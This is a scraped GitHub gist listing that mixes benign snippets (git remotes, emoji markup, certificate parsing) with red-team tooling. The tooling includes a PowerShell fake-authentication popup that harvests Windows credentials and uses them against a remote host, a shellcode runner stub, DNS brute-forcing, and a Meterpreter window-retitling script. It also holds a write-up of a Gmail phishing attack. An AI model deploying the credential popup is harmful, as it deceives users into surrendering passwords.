Skip to content

Instantly share code, notes, and snippets.

View KINGSABRI's full-sized avatar
♠️

KING SABRI KINGSABRI

♠️
397 followers · 196 following
View GitHub Profile
@timruffles
timruffles / attack.md
Last active November 21, 2020 17:35
Chrome/Gmail attack received 11/03/2016. Not sure if the Chrome meta refresh + data:text,html technique is novel.

The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.

DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)

I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:

fake

This linked to a page that ended up displaying a fake "you've been signed out" link, via the data:text/html... URL feature of Chrome:

@rvl
rvl / git-pushing-multiple.rst
Created February 9, 2016 11:41
How to push to multiple git remotes at once. Useful if you keep mirrors of your repo.

Pushing to Multiple Git Repos

If a project has to have multiple git repos (e.g. Bitbucket and Github) then it's better that they remain in sync.

Usually this would involve pushing each branch to each repo in turn, but actually Git allows pushing to multiple repos in one go.

If in doubt about what git is doing when you run these commands, just

@mubix
mubix / powershellpopup.ps1
Created January 12, 2015 20:22
Powershell Popups, proxy aware and auth aware
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
@rekkusu
rekkusu / extconf.rb
Last active August 28, 2018 18:05
Run shellcode from Ruby
require 'mkmf'
create_makefile('shellcode')
@mubix
mubix / brutedns.rb
Created February 20, 2014 04:55
Iteratively brutes dns hostnames
#!/usr/bin/env ruby
#
## Brute code stolen form: https://gist.github.com/petehamilton/4755855
#
@domain = 'contoso.com'
def result?(sub)
results = %x(dig +noall #{sub}.#{@domain} +answer)
@mubix
mubix / brutelist.rb
Created February 20, 2014 04:54
Just charset brute force script
#!/usr/bin/env ruby
#
## Brute code stolen form: https://gist.github.com/petehamilton/4755855
#
def result?(sub)
puts sub
1 == 2
@sonots
sonots / gist:8923003
Last active February 14, 2017 11:35
how to use net/http in muliti threads
require 'net/http'
require 'uri'
host = "localhost"
port = 5125
path = "/api/hoge/hoge/hoge"
body = URI.encode_www_form({'number'=>0, 'mode'=>'gauge'})
# 1)
@client = Net::HTTP.new(host, port)
# @client.set_debug_output(STDOUT)
@mubix
mubix / hacked_windowtext.rb
Created December 20, 2013 05:03
Sets all of the windows titles for the current user to "Hacked"
windows = client.extapi.window.enumerate
windows.each do |winder|
if winder[:title] != 'Default IME'
result = client.railgun.user32.SetWindowTextA(winder[:handle],"Hacked")
end
end
@rxaviers
rxaviers / gist:7360908
Last active May 14, 2025 01:55
Complete list of github markdown emoji markup

People

:bowtie: :bowtie: 😄 :smile: 😆 :laughing:
😊 :blush: 😃 :smiley: ☺️ :relaxed:
😏 :smirk: 😍 :heart_eyes: 😘 :kissing_heart:
😚 :kissing_closed_eyes: 😳 :flushed: 😌 :relieved:
😆 :satisfied: 😁 :grin: 😉 :wink:
😜 :stuck_out_tongue_winking_eye: 😝 :stuck_out_tongue_closed_eyes: 😀 :grinning:
😗 :kissing: 😙 :kissing_smiling_eyes: 😛 :stuck_out_tongue:
@spalladino
spalladino / san.msupn.rb
Last active March 20, 2018 13:38
Extracting Subject Alternative Name Other Name (1.3.6.1.4.1.311.20.2.3) from Microsoft authorization client certificates
cert = OpenSSL::X509::Certificate.new(certificate_string)
subject_alt_name = cert.extensions.find {|e| e.oid == "subjectAltName"}
# Parse the subject alternate name certificate extension as ASN1, first value should be the key
asn_san = OpenSSL::ASN1.decode(subject_alt_name)
raise "Expected ASN1 Subject Alternate Name extension key to be subjectAltName but was #{asn_san.value[0].value}" if asn_san.value[0].value != 'subjectAltName'
# And the second value should be a nested ASN1 sequence
asn_san_sequence = OpenSSL::ASN1.decode(asn_san.value[1].value)